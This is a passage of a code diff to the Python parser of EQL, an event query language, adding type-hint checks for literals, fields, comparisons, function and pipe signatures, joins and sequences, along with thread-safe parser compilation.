+ + return cls._error(node, message, actual_type=actual_type, expected_type=expected_type, **kwargs) def _walk_default(self, node, *args, **kwargs): """Callback function to walk the AST.""" if isinstance(node, list): return [self.walk(n, *args, **kwargs) for n in node] + elif isinstance(node, tuple): + return tuple(self.walk(n, *args, **kwargs) for n in node) return node def walk(self, node, *args, **kwargs): """Optimize the AST while walking it.""" + event_type = kwargs.pop("event_type", None) + split = kwargs.pop("split", False) + + if event_type is not None: + self._event_types.append(event_type) + output = super(EqlWalker, self).walk(node, *args, **kwargs) - if isinstance(output, EqlNode): + + if event_type is not None: + self._event_types.pop() + + if isinstance(output, tuple) and isinstance(output[0], ast.EqlNode) and isinstance(output[1], tuple): + output_node, output_hint = output + output_node = output_node.optimize() + + # If it was optimized to a literal, the type may be constrained + if isinstance(output_node, ast.Literal): + output_hint = types.get_specifier(output_hint), types.get_type(output_node.type_hint) + + output = output_node, output_hint + elif isinstance(output, ast.EqlNode): return output.optimize() + + if split: + if isinstance(output, list): + return [list(o) for o in transpose(output)] + return zip(*output) + return output + def validate_signature(self, node, signature, arguments, hints): + """Validate a signature against input arguments and type hints.""" + error_node = node + node_type = 'pipe' if issubclass(signature, ast.PipeCommand) else 'function' + name = signature.name + bad_index, new_arguments, new_hints = signature.validate(arguments, hints) + + if bad_index is None: + # no error exists, so no need to build a message + return new_arguments, new_hints + + min_args = signature.minimum_args if signature.minimum_args is not None else len(signature.argument_types) + max_args = None + + if signature.additional_types is None: + max_args = len(signature.argument_types) + + # Try to line up the error message with the argument that went wrong + # Strings and numbers don't generate tatsu nodes, so its difficult to recover parseinfo + if min_args is not None and len(arguments) < min_args: + message = "Expected at least {} argument{} to pipe {}".format( + min_args, 's' if min_args != 1 else '', node.name) + raise self._error(error_node, message, end=len(arguments) != 0) + + elif max_args is not None and max_args < len(arguments): + if max_args == 0: + argument_desc = 'no arguments' + elif max_args == 1: + argument_desc = 'only 1 argument' + else: + argument_desc = 'up to {} arguments'.format(max_args) + message = "Expected {} to {} {}".format(argument_desc, node_type, name) + error_node = node.args[max_args] + raise self._error(error_node, message) + + elif bad_index is not None: + if isinstance(node.args[bad_index], tatsu.semantics.Node): + error_node = node.args[bad_index] + + actual_type = hints[bad_index] + expected_type = signature.additional_types + + if bad_index < len(signature.argument_types): + expected_type = signature.argument_types[bad_index] + + if expected_type is not None and not types.check_full_hint(expected_type, actual_type): + raise self._type_error(error_node, "Expected {expected_type} not {actual_type} to {name}", + expected_type, actual_type, name=name) + raise self._error(error_node, "Invalid argument to {name}", name=name) + + return new_arguments, new_hints + + def walk__root_expression(self, node, keep_hint=False, query_condition=False): + """Get the root expression, and rip out the type hint.""" + expr, hint = self.walk(node.expr) + if query_condition and not self._implied_booleans and not types.check_types(types.BOOLEAN, hint): + raise self._type_error(node.expr, "Expected {expected_type} not {actual_type}", types.BOOLEAN, hint) + if keep_hint: + return expr, hint + return expr + # literals - def walk__literal(self, node): + def walk__literal(self, node, **kwargs): """Callback function to walk the AST.""" - literal = self.walk(node.value) - if literal is None: - return literal - elif is_string(literal): + value = self.walk(node.value) + cls = ast.Literal.find_type(value) + + if cls is ast.String: + value = to_unicode(value) + # If a 'raw' string is detected, then only unescape the quote character if node.text.startswith('?'): quote_char = node.text[-1] - literal = literal.replace("\\" + quote_char, quote_char) + value = value.replace("\\" + quote_char, quote_char) else: - literal = String.unescape(literal) - return String(to_unicode(literal)) - elif isinstance(literal, bool): - return Boolean(literal) - else: - return Number(literal) + value = ast.String.unescape(value) + + return cls(value), types.literal(cls.type_hint) def walk__time_range(self, node): """Callback function to walk the AST.""" @@ -122,38 +345,122 @@ def walk__time_range(self, node): unit = self.walk(node.unit) for name, interval in units.items(): if name.startswith(unit.rstrip('s') or 's'): - return TimeRange(datetime.timedelta(seconds=val * interval)) + return ast.TimeRange(datetime.timedelta(seconds=val * interval)), types.literal(types.NUMBER) raise self._error(node, "Unknown time unit") + def walk__check_parentheses(self, node): + """Check that parentheses are matching.""" + # check for the deepest one first, so it can raise an exception + expr = self.walk(node.expr) + + if node.ast.get('closing', ')') is None: + raise self._error(node, "Mismatched parentheses ()") + return expr + # fields - def walk__field(self, node): + def walk__attribute(self, node): + """Validate attributes.""" + if node.attr in RESERVED: + raise self._error(node, "Illegal use of reserved value") + return node.attr + + def walk__array_index(self, node): + """Get the index for the field in the array.""" + if node.ast.get('value', None) is not None: + return node.value + + if node.ast.get('closing', ']') is None: + raise self._error(node, "Mismatched brackets []") + + if 'missing' in node.ast: + raise self._error(node, "Required index to array.") + raise self._error(node, "Invalid index to array.") + + def _get_field_hint(self, node, field, allow_enum=False): + type_hint = types.BASE_ALL + allow_missing = self._schema.allow_missing + + if self._in_pipes: + event_schema = self._pipe_schemas[0] + event_field = field + if self.multiple_events: + event_index, event_field = field.query_multiple_events() + num_events = len(self._pipe_schemas) + if event_index >= num_events: + raise self._error(node.sub_fields[0], "Invalid index. Event array is size {num}", num=num_events) + event_schema = self._pipe_schemas[event_index] + + # Now that we have the schema + event_type, = event_schema.schema.keys() + type_hint = event_schema.get_event_type_hint(event_type, event_field.full_path) + allow_missing = self._schema.allow_missing + + elif not self._schema: + return field, types.dynamic(type_hint) + + # check if it's a variable and + elif node.base not in self._var_types: + event_field = field + event_type = self.event_type + + type_hint = self._schema.get_event_type_hint(event_type, event_field.full_path) + + # Determine if the field should be converted as an enum + # from subtype.create -> subtype == "create" + if type_hint is None and self._allow_enum and event_field.path and is_string(event_field.path[-1]): + base_field = ast.Field(event_field.base, event_field.path[:-1]) + enum_value = ast.String(event_field.path[-1]) + base_hint = self._schema.get_event_type_hint(event_type, base_field.full_path) + + if types.check_types(types.STRING, base_hint): + return ast.Comparison(base_field, ast.Comparison.EQ, enum_value), types.dynamic(types.BOOLEAN) + + if type_hint is None and not allow_missing: + message = "Field not recognized" + if event_type not in (EVENT_TYPE_ANY, EVENT_TYPE_GENERIC): + message += " for {event_type} event" + raise self._error(node, message, cls=EqlSchemaError, event_type=event_type) + + # the field could be missing, so allow for null checks unless it's explicitly disabled + if not self._strict_fields: + type_hint = types.union(type_hint, types.NULL) + + return field, types.dynamic(type_hint) + + def walk__field(self, node, get_variable=False, **kwargs): """Callback function to walk the AST.""" - reserved = 'true', 'false', 'null' - if node.base in reserved: + if get_variable: + if node.base in RESERVED or node.sub_fields: + raise self._type_error(node, "Expected {expected_type} not {field} to function", types.VARIABLE) + elif node.base in self._var_types: + raise self._error(node, "Reuse of variable {base}") + + # This can be overridden by the parent function that is parsing it + self._var_types[node.base] = types.BASE_ALL + return ast.Field(node.base), types.VARIABLE + + if node.base in RESERVED: if len(node.sub_fields) != 0: - raise self._error(node, "Invalid field name {base}") - elif node.base == 'true': - return Boolean(True) - elif node.base == 'false': - return Boolean(False) - elif node.base == 'null': - return Null() - else: - raise self._error(node.base, "Unhandled literal") + raise self._error(node, "Illegal use of reserved value") - path = [] + value = RESERVED[node.base] + return value, types.literal(value.type_hint) - for sub_field in self.walk(node.sub_fields): - if is_string(sub_field) and sub_field in reserved: - raise self._error(node, "Invalid attribute {}".format(sub_field)) - path.append(sub_field) + path = self.walk(node.sub_fields) if not path and node.base in self.preprocessor.constants: constant = self.preprocessor.constants[node.base] - return constant.value + return constant.value, types.literal(constant.value.type_hint) + + # Check if it's part of the current preprocessor that we are building + # and if it is, then return it unexpanded but with a type hint + if not path and node.base in self.new_preprocessor.constants: + constant = self.new_preprocessor.constants[node.base] + return ast.Field(node.base), types.literal(constant.value.type_hint) - return Field(node.base, path) + field = ast.Field(node.base, path) + return self._get_field_hint(node, field, allow_enum=self._allow_enum) # comparisons def walk__equals(self, node): @@ -161,53 +468,213 @@ def walk__equals(self, node): # May be double or single equals return '==' + def walk__comparator(self, node): + """Walk comparators like <= < != == > >=.""" + return self.walk(node.comp) + def walk__comparison(self, node): """Callback function to walk the AST.""" - left = self.walk(node.left) - right = self.walk(node.right) + left, left_type = self.walk(node.left) + right, right_type = self.walk(node.right) op = self.walk(node.op) + accepted_types = types.union(types.PRIMITIVES, types.NULL) + error_message = "Unable to compare {expected_type} to {actual_type}" + + if not types.check_types(left_type, right_type) or \ + not types.check_types(accepted_types, left_type) or \ + not types.check_types(accepted_types, right_type): + # check if the types can actually be compared, and don't allow comparison of nested types + raise self._type_error(node.op, error_message, types.clear(left_type), types.clear(right_type)) + + if op in (ast.Comparison.LT, ast.Comparison.LE, ast.Comparison.GE, ast.Comparison.GE): + # check that <, <=, >, >= are only supported for strings or integers + lt = types.get_type(left_type) + rt = types.get_type(right_type) + + # string to string or number to number + if not ((types.check_full_hint(types.STRING, lt) and types.check_full_hint(types.STRING, rt)) or + (types.check_full_hint(types.NUMBER, lt) and types.check_full_hint(types.NUMBER, rt))): + raise self._type_error(node.op, error_message, types.clear(left_type), types.clear(right_type)) + + comp_node = ast.Comparison(left, op, right) + hint = types.get_specifier(types.union(left_type, right_type)), types.get_type(types.BOOLEAN) + # there is no special comparator for wildcards, just look for * in the string - if isinstance(right, String) and '*' in right.value: - if op == Comparison.EQ: - return FunctionCall('wildcard', [left, right]) - elif op == Comparison.NE: - return ~ FunctionCall('wildcard', [left, right]) + if isinstance(right, ast.String) and '*' in right.value: + func_call = ast.FunctionCall('wildcard', [left, right]) + + if op == ast.Comparison.EQ: + return func_call, hint + elif op == ast.Comparison.NE: + return ~ func_call, hint - return Comparison(left, op, right) + return comp_node, hint def walk__and_terms(self, node): """Callback function to walk the AST.""" - terms = self.walk(node.terms) - term = And(terms) - return term + terms, hints = self.walk(node.terms, split=True) + if not self._implied_booleans: + for tatsu_node, hint in zip(node.terms, hints): + if not types.check_types(types.BOOLEAN, hint): + raise self._type_error(tatsu_node, "Expected {expected_type}, not {actual_type}", + types.BOOLEAN, hint) + + term = ast.And(terms) + return term, types.union(*hints) def walk__or_terms(self, node): """Callback function to walk the AST.""" - terms = self.walk(node.terms) - term = Or(terms) - return term + terms, hints = self.walk(node.terms, split=True) + if not self._implied_booleans: + for tatsu_node, hint in zip(node.terms, hints): + if not types.check_types(types.BOOLEAN, hint): + raise self._type_error(tatsu_node, "Expected {expected_type}, not {actual_type}", + types.BOOLEAN, hint) + term = ast.Or(terms) + return term, types.union(*hints) def walk__not_term(self, node): """Callback function to walk the AST.""" - term = Not(self.walk(node.t)) - return term + term, hint = self.walk(node.t) + return ~ term, types.union(hint) def walk__in_set(self, node): """Callback function to walk the AST.""" - expr = self.walk(node.expr) - container = self.walk(node.container) # type: list[Expression] - return InSet(expr, container) + expr, outer_hint = self.walk(node.expr) + container, sub_hints = self.walk(node.container, keep_hint=True, split=True) + outer_spec = types.get_specifier(outer_hint) + outer_type = types.get_type(outer_hint) + container_specifiers = [types.get_specifier(h) for h in sub_hints] + container_types = [types.get_type(h) for h in sub_hints] + + # Check that everything inside the container has the same type as outside + error_message = "Unable to compare {expected_type} to {actual_type}" + for container_node, node_type in zip(node.container, container_types): + if not types.check_types(outer_type, node_type): + raise self._type_error(container_node, error_message, outer_type, node_type) + + # This will always evaluate to true/false, so it should be a boolean + term = ast.InSet(expr, container) + return term, (types.union_specifiers(outer_spec, *container_specifiers), types.BASE_BOOLEAN) + + def _get_type_hint(self, node, ast_node): + """Get the recommended type hint for a node when it isn't already known. + + This will likely only get called when expanding macros, until type hints are attached to AST nodes. + """ + type_hint = types.EXPRESSION + + if isinstance(ast_node, ast.Literal): + type_hint = ast_node.type_hint + elif isinstance(ast_node, (ast.Comparison, ast.InSet)): + type_hint = types.BOOLEAN + elif isinstance(ast_node, ast.Field): + type_hint = types.EXPRESSION + + if ast_node.base not in self._var_types: + ast_node, type_hint = self._get_field_hint(node, ast_node) + + # Make it dynamic because it's a field + type_hint = types.dynamic(type_hint) + + if not self._strict_fields: + type_hint = types.union(type_hint, types.NULL) + + elif isinstance(ast_node, ast.FunctionCall): + signature = self._function_lookup.get(node.name) + if signature: + type_hint = signature.return_value + + if any(isinstance(n, ast.Field) for n in ast_node): + type_hint = types.dynamic(type_hint) + + return type_hint def walk__function_call(self, node): """Callback function to walk the AST.""" - args = self.walk(node.args) or [] - if node.name in self.preprocessor.macros: + args = [] + + if node.args: + args, hints = self.walk(node.args, split=True) + macro = self.preprocessor.macros[node.name] - return macro.expand(args, self._eql_walker) + expanded = macro.expand(args) + type_hint = self._get_type_hint(node, expanded) + return expanded, type_hint - return FunctionCall(node.name, args) + elif node.name in self.new_preprocessor.macros: + args = [] + + if node.args: + args, hints = self.walk(node.args, split=True) + macro = self.new_preprocessor.macros[node.name] + expanded = macro.expand(args) + type_hint = self._get_type_hint(node, expanded) + return expanded, type_hint + + signature = self._function_lookup.get(node.name) + + if signature: + # Check for any variables in the signature, and handle their type hints differently + variables = set(idx for idx, hint in enumerate(signature.argument_types) if hint == types.VARIABLE) + + arguments = [] + + # Back up the current variable type hints for when this function goes out of scope + old_variables = self._var_types.copy() + + # Get all of the arguments first, because they may depend on others + # and we need to pull out all of the variables + for idx, arg_node in enumerate(node.args or []): + if idx in variables: + exc = self._type_error(arg_node, "Invalid argument to {name}. Expected {expected_type}", + types.VARIABLE, name=node.name) + + if arg_node.parseinfo.rule == 'field': + try: + arguments.append(self.walk(arg_node, get_variable=True)) + except EqlTypeMismatchError: + pass + else: + continue + + # Ignore the original exception and raise our own, which has the function name in it + raise exc + + else: + arguments.append(self.walk(arg_node)) + + # Then validate this against the signature + args, hints = transpose(arguments) + + # In theory, we could do another round of validation for generics, but we'll just assume + # that loop variables can take any shape they need to, as long as the other arguments match + + # Validate that the arguments match the function signature by type and length + args, hints = self.validate_signature(node, signature, args, hints) + + # Restore old variables, since ours are out of scope now + self._var_types = old_variables + + # Get return value and specifier, and mark as dynamic if any of the inputs are + output_hint = signature.return_value + + if hints and types.is_dynamic(types.union(*hints)): + output_hint = types.dynamic(output_hint) + + return ast.FunctionCall(node.name, args), output_hint + + elif self._check_functions: + raise self._error(node, "Unknown function {name}", width=len(node.name)) + else: + args = [] + + if node.args: + args, _ = self.walk(node.args, split=True) + + return ast.FunctionCall(node.name, args), types.dynamic(types.EXPRESSION) # queries def walk__event_query(self, node): @@ -218,79 +685,89 @@ def walk__event_query(self, node): raise self._error(node, "Missing event type and 'where' condition") else: event_type = node.event_type - if not check_event_name(event_type): - raise self._error(node, "Invalid event type: {event_type}", cls=SchemaError) - return EventQuery(event_type, self.walk(node.cond)) + if self._schema and not self._schema.validate_event_type(event_type): + raise self._error(node, "Invalid event type: {event_type}", cls=EqlSchemaError, width=len(event_type)) + + condition = self.walk(node.cond, event_type=event_type, query_condition=True) + return ast.EventQuery(event_type, condition) def walk__pipe(self, node): """Callback function to walk the AST.""" if not self._pipes_enabled: raise self._error(node, "Pipes not supported") - pipe_cls = PipeCommand.lookup.get(node.name) - if pipe_cls is None: - raise self._error(node, "Unknown pipe '{name}'") + pipe_cls = ast.PipeCommand.lookup.get(node.name) + if pipe_cls is None or node.name not in self._allowed_pipes: + raise self._error(node, "Unknown pipe {name}", width=len(node.name)) - pipe = pipe_cls(self.walk(node.args)) # type: PipeCommand - num_args = len(pipe.arguments) + args = [] + hints = [] - error_node = node - - # Try to line up the error message withe the argument that went wrong - # Strings and numbers don't generate tatsu nodes, so its difficult to recover parseinfo - - if pipe.minimum_args is not None and num_args < pipe.minimum_args: - message = "Expected {} argument(s) to pipe '{}'".format(pipe.minimum_args, node.name) - raise self._error(error_node, message, end=True) - - elif pipe.maximum_args is not None and num_args > pipe.maximum_args: - message = "Expected up to {} argument(s) to pipe '{}'".format(pipe.maximum_args, node.name) - if isinstance(node.args[pipe.maximum_args], tatsu.semantics.Node): - error_node = node.args[pipe.maximum_args] - raise self._error(error_node, message) + if node.args: + args, hints = self.walk(node.args, split=True) - bad_index = pipe.validate() - if bad_index is not None: - if isinstance(node.args[bad_index], tatsu.semantics.Node): - error_node = node.args[bad_index] - raise self._error(error_node, "Invalid arguments to '{}'".format(node.name)) - return pipe + args, hints = self.validate_signature(node, pipe_cls, args, hints) + self._pipe_schemas = pipe_cls.output_schemas(args, hints, self._pipe_schemas) + return pipe_cls(args) def walk__piped_query(self, node): """Callback function to walk the AST.""" if node.query is None: - first = EventQuery(EVENT_TYPE_ANY, Boolean(True)) + first = ast.EventQuery(EVENT_TYPE_ANY, ast.Boolean(True)) if not self.implied_base: raise self._error(node, "Missing base query") else: first = self.walk(node.query) - return PipedQuery(first, self.walk(node.pipes)) - def walk__named_query(self, node): - """Callback function to walk the AST.""" + self._in_pipes = True + if isinstance(first, ast.EventQuery): + base_event_types = [first.event_type] + else: + base_event_types = [q.query.event_type for q in first.queries] + + # Now, create the schema for each event in the array + flattened_schema = self._schema.flatten() + for event_type in base_event_types: + if event_type == EVENT_TYPE_ANY: + self._pipe_schemas.append(flattened_schema) + elif event_type in self._schema.schema: + self._pipe_schemas.append(Schema({EVENT_TYPE_GENERIC: self._schema.schema[event_type]})) + else: + self._pipe_schemas.append(Schema({EVENT_TYPE_GENERIC: {}})) + + return ast.PipedQuery(first, self.walk(node.pipes)) + + def walk__subquery_type(self, node): + """Get the subquery type.""" if not self._subqueries_enabled: raise self._error(node, "Subqueries not supported") + elif self._in_pipes: + raise self._error(node, "Not supported within pipe") + + if node.name not in ast.NamedSubquery.supported_types: + raise self._error(node, "Unknown subquery type '{name} of'") - if node.name not in NamedSubquery.supported_types: - options = ', '.join(NamedSubquery.supported_types) - raise self._error(node, "Unknown subquery '{name}' of. Available options are: " + options) - return NamedSubquery(node.name, self.walk(node.query)) + return node.name - def walk__named_params(self, node, get_param=None): + def walk__named_query(self, node): + """Callback function to walk the AST.""" + return ast.NamedSubquery(self.walk(node.stype), self.walk(node.query)), types.dynamic(types.BOOLEAN) + + def walk__named_params(self, node, get_param=None, position=None, close=None): """Callback function to walk the AST.""" params = OrderedDict() if get_param is None and len(node.params) > 0: raise self._error(node, "Unexpected parameters") for param in node.params: - key, value = get_param(param) + key, value = get_param(param, position=position, close=close) if key in params: - raise self._error(param, "Repeated parameter '{k}'") + raise self._error(param, "Repeated parameter {k}") params[key] = value - return NamedParams(params) + return ast.NamedParams(params) - def walk__subquery_by(self, node, num_values=None, get_param=None): + def walk__subquery_by(self, node, num_values=None, position=None, close=None, get_param=None): """Callback function to walk the AST.""" if not self._subqueries_enabled: raise self._error(node, "Subqueries not supported") @@ -302,106 +779,181 @@ def walk__subquery_by(self, node, num_values=None, get_param=None): else: end = False error_node = node.join_values[max(num_values, len(node.join_values)) - 1] - raise self._error(error_node, "Expected {} value(s)".format(num_values), end=end) - - join_values = self.walk(node.join_values) - params = self.walk(node.params, get_param=get_param) + message = "Expected {num} value" + if num_values != 1: + message += "s" + raise self._error(error_node, message, num=num_values, end=end) + params = self.walk(node.params, get_param=get_param, position=position, close=close) query = self.walk(node.query) - return SubqueryBy(query, params, join_values) + if node.join_values: + join_values, join_hints = self.walk(node.join_values, event_type=query.event_type, split=True) + else: + join_values, join_hints = [], [] + return ast.SubqueryBy(query, params, join_values), join_hints def walk__join(self, node): """Callback function to walk the AST.""" + queries, close = self._get_subqueries_and_close(node) + return ast.Join(queries, close) + + def _get_subqueries_and_close(self, node, get_param=None): + """Helper function used by join and sequence to avoid duplicate code.""" if not self._subqueries_enabled: + # Raise the error earlier (instead of waiting until subquery_by) so that it's more meaningful raise self._error(node, "Subqueries not supported") - shared = [] + # Figure out how many fields are joined by in the first query, and match across all + first, first_hints = self.walk(node.queries[0], get_param=get_param, position=0) + num_values = len(first.join_values) + queries = [(first, first_hints)] + + for pos, query in enumerate(node.queries[1:], 1): + queries.append(self.walk(query, num_values=num_values, get_param=get_param, position=pos)) + + shared = node.ast.get('shared_by') close = None - if node.ast.get('shared_by'): - shared = self.walk(node.shared_by) + # Validate that each field has matching types + default_hint = types.get_type(types.union(types.PRIMITIVES, types.NULL)) + strict_hints = [default_hint] * num_values - # Figure out how many fields are joined by in the first query, and match across all - first = self.walk(node.queries[0]) - num_values = len(first.join_values) - queries = [first] # type: list[SubqueryBy] - queries.extend(self.walk(node.queries[1:], num_values=num_values)) + if shared: + strict_hints += [default_hint] * len(shared) + + def check_by_field(by_pos, by_node, by_hint): + # Check that the possible values for our field that match what we currently understand about this type + intersected = types.intersect_types(strict_hints[by_pos], by_hint) + if not intersected or not types.is_dynamic(by_hint): + raise self._type_error(by_node, "Unable to join {expected_type} to {actual_type}", + strict_hints[by_pos], by_hint) + + # Restrict the acceptable fields from what we've seen + strict_hints[by_pos] = intersected + + for qpos, (query, query_by_hints) in enumerate(queries): + unshared_fields = [] + curr_by_hints = query_by_hints + curr_join_nodes = node.queries[qpos].join_values + + if shared: + curr_shared_by, curr_shared_hints = self.walk(shared, event_type=query.query.event_type, split=True) + curr_by_hints = curr_shared_hints + curr_by_hints + query.join_values = curr_shared_by + query.join_values + curr_join_nodes = shared + curr_join_nodes - for query in queries: - query.join_values = shared + query.join_values + # Now that they've all been built out, start to intersect the types + for fpos, (n, h) in enumerate(zip(curr_join_nodes, curr_by_hints)): + check_by_field(fpos, n, h) - if node.ast.get('until'): - close = self.walk(node.until, num_values=num_values) # type: SubqueryBy - close.join_values = shared + close.join_values + # Add all of the fields to the beginning of this subquery's BY fields and preserve the order + query.join_values = unshared_fields + query.join_values - return Join(queries, close) + if node.ast.get("until"): + close, close_hints = self.walk(node.until, num_values=num_values, get_param=get_param, close=True) + close_nodes = [node.until] - def get_sequence_parameter(self, node): + if shared: + shared_by, shared_hints = self.walk(node.shared_by, event_type=close.query.event_type, split=True) + close_hints = close_hints + shared_hints + close.join_values = shared_by + close.join_values + close_nodes = shared + close_nodes + + # Check the types of the by field + for fpos, (n, h) in enumerate(zip(close_nodes, close_hints)): + check_by_field(fpos, n, h) + + # Unzip the queries from the (query, hint) tuples + queries, _ = zip(*queries) + return list(queries), close + + def get_sequence_parameter(self, node, **kwargs): """Validate that sequence parameters are working.""" - key, value = self.walk([node.k, node.v]) - value = TimeRange.convert(value) + key, (value, value_hint) = self.walk([node.k, node.v]) + value = ast.TimeRange.convert(value) if key != 'maxspan': - raise self._error(node, "Unknown sequence parameter '{}'".format(key)) + raise self._error(node, "Unknown sequence parameter {}".format(key)) - if not TimeRange.convert(value) or value.delta < datetime.timedelta(0): + if not ast.TimeRange.convert(value) or value.delta < datetime.timedelta(0): error_node = node.v if isinstance(node.v, tatsu.objectmodel.Node) else node - raise self._error(error_node, "Invalid value for '{}'".format(key)) + raise self._error(error_node, "Invalid value for {}".format(key)) return key, value - def get_sequence_term_parameter(self, param_node): + def get_sequence_term_parameter(self, param_node, position, close): """Validate that sequence parameters are working for items in sequence.""" - key, value = self.walk([param_node.k, param_node.ast.get('v', Boolean(True))]) - if value is None: - value = Boolean(True) + if not position or close: + raise self._error(param_node, "Unexpected parameters") + + # set the default type to a literal 'true' + value, type_hint = ast.Boolean(True), types.literal(types.BOOLEAN) + key = self.walk(param_node.k) + if param_node.ast.get('v'): + value, type_hint = self.walk(param_node.v) + + if key == 'fork': + if not types.check_types(types.literal((types.NUMBER, types.BOOLEAN)), type_hint): + raise self._type_error(param_node, + "Expected type {expected_type} value for {k}", + types.literal(types.BOOLEAN)) - if key != 'fork': - raise self._error(param_node, "Unknown parameter '{}'".format(key)) + if value.value not in (True, False, 0, 1): + raise self._error(param_node, "Invalid value for {k}") - elif not isinstance(value, (Boolean, Number)) or value.value not in (True, False, 0, 1): - raise self._error(param_node, "Invalid value for '{}'".format(key)) + else: + raise self._error(param_node, "Unknown parameter {k}") - return key, Boolean(bool(value.value)) + return key, ast.Boolean(bool(value.value)) def walk__sequence(self, node): """Callback function to walk the AST.""" if not self._subqueries_enabled: raise self._error(node, "Subqueries not supported") - shared = [] - close = None params = None - if node.ast.get('shared_by'): - shared = self.walk(node.shared_by) - if node.ast.get('params'): params = self.walk(node.params, get_param=self.get_sequence_parameter) - # Figure out how many fields are joined by in the first query, and match across all - first = self.walk(node.queries[0]) - num_values = len(first.join_values) - queries = [first] # type: list[SubqueryBy] - queries.extend(self.walk(node.queries[1:], num_values=num_values, get_param=self.get_sequence_term_parameter)) - - for query in queries: - query.join_values = shared + query.join_values - - if node.ast.get('until'): - close = self.walk(node.until, num_values=num_values) - close.join_values = shared + close.join_values - - return Sequence(queries, params, close) + queries, close = self._get_subqueries_and_close(node, get_param=self.get_sequence_term_parameter) + return ast.Sequence(queries, params, close) # definitions def walk__macro(self, node): """Callback function to walk the AST.""" - return Macro(node.name, node.params, self.walk(node.body)) + definition = ast.Macro(node.name, node.params, self.walk(node.body)) + self.new_preprocessor.add_definition(definition) + return definition def walk__constant(self, node): """Callback function to walk the AST.""" - return Constant(node.name, self.walk(node.value)) + value, _ = self.walk(node.value) + definition = ast.Constant(node.name, value) + self.new_preprocessor.add_definition(definition) + return definition + + +def _build_parser(): + """Build a parser one-time. These appear to be thread-safe so this only needs to happen once.""" + global GRAMMAR, compiled_parser + + if compiled_parser is not None: + return compiled_parser + + with compiler_lock: + if compiled_parser is None: + GRAMMAR = get_etc_file('eql.ebnf') + compiled_parser = tatsu.compile(GRAMMAR, parseinfo=True, semantics=tatsu.semantics.ModelBuilderSemantics()) + + return compiled_parser + + +def _get_parser(): + """Try to get a thread-safe parser, and compile if necessary.""" + if not hasattr(local, "parser"): + local.parser = _build_parser() + return local.parser def _parse(text, start=None, preprocessor=None, implied_any=False, implied_base=False, pipes=True, subqueries=True): @@ -418,34 +970,53 @@ def _parse(text, start=None, preprocessor=None, implied_any=False, implied_base= :param PreProcessor preprocessor: Optional preprocessor to expand definitions and constants :rtype: EqlNode """ - global GRAMMAR, tatsu_parser - - if tatsu_parser is None: - GRAMMAR = get_etc_file('eql.ebnf') - tatsu_parser = tatsu.compile(GRAMMAR, parseinfo=True, semantics=tatsu.semantics.ModelBuilderSemantics()) + parser = _get_parser() if not text.strip(): - raise ParseError("No text specified", 0, 0, text) + raise EqlParseError("No text specified", 0, 0, text) # Convert everything to unicode text = to_unicode(text) - walker = EqlWalker(implied_any=implied_any, implied_base=implied_base, - preprocessor=preprocessor, pipes=pipes, subqueries=subqueries) - - try: - model = tatsu_parser.parse(text, rule_name=start, start=start, parseinfo=True) - eql_node = walker.walk(model) - return eql_node - except tatsu.exceptions.FailedParse as e: - info = e.buf.line_info(e.pos) - message = e.message + + with ParserConfig(implied_any=implied_any, implied_base=implied_base, allow_subqueries=subqueries, + preprocessor=preprocessor, allow_pipes=pipes) as cfg: + + walker = EqlWalker() + load_extensions(force=False) + exc = None + + try: + model = parser.parse(text, rule_name=start, start=start, parseinfo=True) + eql_node = walker.walk(model) + if not isinstance(eql_node, ast.EqlNode) and isinstance(eql_node, tuple): + eql_node, type_hint = eql_node + return eql_node + except EqlError as e: + # If full traceback mode is enabled, then re-raise the exception + if cfg.read_stack("full_traceback", debugger_attached): + raise + exc = e + except tatsu.exceptions.FailedParse as e: + # Remove the tatsu exception from the traceback + exc = e + + if isinstance(exc, EqlError): + # at this point, the full traceback isn't wanted, so raise it from here + raise exc + + if isinstance(exc, tatsu.exceptions.FailedParse): + info = exc.buf.line_info(exc.pos) + message = 'Invalid syntax' line = info.line col = info.col + source = info.text.rstrip() if not source: - source = text.strip().splitlines()[-1].strip() + source = text.rstrip().splitlines()[-1].rstrip() col = max(len(source) - 1, 0) - raise ParseError(message, line, col, source) + + # Raise an EQL error instead + raise EqlSyntaxError(message, line, col, source) def parse_base_query(text, implied_any=False, implied_base=False, preprocessor=None, subqueries=True): @@ -480,7 +1051,7 @@ def parse_event_query(text, implied_any=False, implied_base=False, preprocessor= implied_any=implied_any, implied_base=implied_base, preprocessor=preprocessor, subqueries=subqueries) -def parse_query(text, implied_any=False, implied_base=False, preprocessor=None, subqueries=True, pipes=True): +def parse_query(text, implied_any=False, implied_base=False, preprocessor=None, subqueries=True, pipes=True, cli=False): """Parse a full EQL query with pipes. :param str text: EQL source text to parse @@ -493,7 +1064,8 @@ def parse_query(text, implied_any=False, implied_base=False, preprocessor=None, :param PreProcessor preprocessor: Optional preprocessor to expand definitions and constants :rtype: PipedQuery """ - return _parse(text, 'single_query', implied_any=implied_any, implied_base=implied_base, preprocessor=preprocessor, + rule = "cli_query" if cli else "single_query" + return _parse(text, rule, implied_any=implied_any, implied_base=implied_base, preprocessor=preprocessor, subqueries=subqueries, pipes=pipes) @@ -512,6 +1084,28 @@ def parse_expression(text, implied_any=False, preprocessor=None, subqueries=True implied_any=implied_any, preprocessor=preprocessor, subqueries=subqueries) +def parse_atom(text, cls=None): # type: (str, type) -> ast.Field|ast.Literal + """Parse and get an atom.""" + rule = "single_atom" + atom = _parse(text, start="single_atom") + if cls is not None and not isinstance(atom, cls): + walker = EqlWalker() + tatsu_ast = _get_parser().parse(text, rule_name=rule, start=rule, parseinfo=True) + raise walker._error(tatsu_ast, "Expected {expected} not {actual}", + expected=cls.__name__.lower(), actual=type(atom).__name__.lower()) + return atom + + +def parse_literal(text): # type: (str) -> ast.Literal + """Parse and get a literal.""" + return parse_atom(text, cls=ast.Literal) + + +def parse_field(text): # type: (str) -> ast.Field + """Parse and get a field.""" + return parse_atom(text, cls=ast.Field) + + def parse_analytic(analytic_info, preprocessor=None, **kwargs): """Parse an EQL analytic from a dictionary with metadata. @@ -524,7 +1118,7 @@ def parse_analytic(analytic_info, preprocessor=None, **kwargs): text = dct['query'] query = parse_query(text, preprocessor=preprocessor, **kwargs) dct['query'] = query - return EqlAnalytic(**dct) + return ast.EqlAnalytic(**dct) def parse_analytics(analytics, preprocessor=None, **kwargs): @@ -536,7 +1130,7 @@ def parse_analytics(analytics, preprocessor=None, **kwargs): :rtype: list[EqlAnalytic] """ if preprocessor is None: - preprocessor = PreProcessor() + preprocessor = ast.PreProcessor() return [parse_analytic(r, preprocessor=preprocessor, **kwargs) for r in analytics] @@ -582,7 +1176,7 @@ def get_preprocessor(text, implied_any=False, subqueries=None, preprocessor=None # inherit all 